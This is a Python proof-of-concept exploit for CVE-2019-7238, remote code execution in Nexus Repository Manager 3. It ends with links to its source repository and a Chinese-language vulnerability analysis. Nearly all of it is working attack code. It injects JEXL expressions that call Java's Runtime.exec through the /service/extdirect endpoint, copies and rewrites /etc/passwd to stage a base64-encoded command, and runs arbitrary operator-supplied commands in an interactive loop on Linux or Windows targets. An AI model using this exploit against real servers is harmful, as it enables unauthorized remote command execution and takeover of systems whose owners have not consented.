CVE-2019-7238 poc

from requests.packages.urllib3.exceptions import InsecureRequestWarning
import urllib3
import requests
import base64
import json
import sys

print("
Nexus Repository Manager 3 Remote Code Execution - CVE-2019-7238 
Found by @Rico and @voidfyoo
")

proxy = {
}

remote = 'http://127.0.0.1:8081'

ARCH="LINUX"
# ARCH="WIN"

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def checkSuccess(r):
    if r.status_code == 200:
        json_data = json.loads(r.text)
        if json_data['result']['total'] > 0:
            print("OK")
        else:
            print("KO")
            sys.exit()
    else:
        print("[-] Error status code", r.status_code)
        sys.exit()


print("[+] Checking if Content-Selectors exist =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==1"}, {
    "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json,
              proxies=proxy, verify=False, allow_redirects=False)
checkSuccess(r)
print("")

while True:
    try:
        if ARCH == "LINUX":
            command = input("command (not reflected)> ")
            command = base64.b64encode(command.encode('utf-8'))
            command_str = command.decode('utf-8')
            command_str = command_str.replace('/', '+')

            print("[+] Copy file to temp directory =>", end=' ')

            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("cp /etc/passwd  /tmp/passwd")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)

            print("[+] Preparing temp file =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("sed -i 1cpwn2  /tmp/passwd")"}, {
                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
                        verify=False, allow_redirects=False)
            checkSuccess(r)

            print("[+] Cleaning temp file =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("sed -i /[^pwn2]/d /tmp/passwd")"}, {
                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
                            verify=False, allow_redirects=False)
            checkSuccess(r)

            print("[+] Writing command into temp file =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("sed -i 1s/pwn2/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd")"}, {
                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
                            verify=False, allow_redirects=False)
            checkSuccess(r)

            print("[+] Decode base64 command =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("bash /tmp/passwd")"}, {
                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
                            verify=False, allow_redirects=False)
            checkSuccess(r)

            print("[+] Executing command =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("bash pwn.txt")"}, {
                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
                            verify=False, allow_redirects=False)
            checkSuccess(r)
            print('')

        else:
            command = input("command (not reflected)> ")
            print("[+] Executing command =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec("" + command + "")"}, {
                "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
                              verify=False, allow_redirects=False)
            checkSuccess(r)
            print('')

    except KeyboardInterrupt:
        print("Exiting...")
        break

脚本地址：https://github.com/mpgn/CVE-2019-7238/blob/master/CVE-2019-7238.py

漏洞分析：https://cert.360.cn/report/detail?id=3ec687ec01cccd0854e2706590ddc215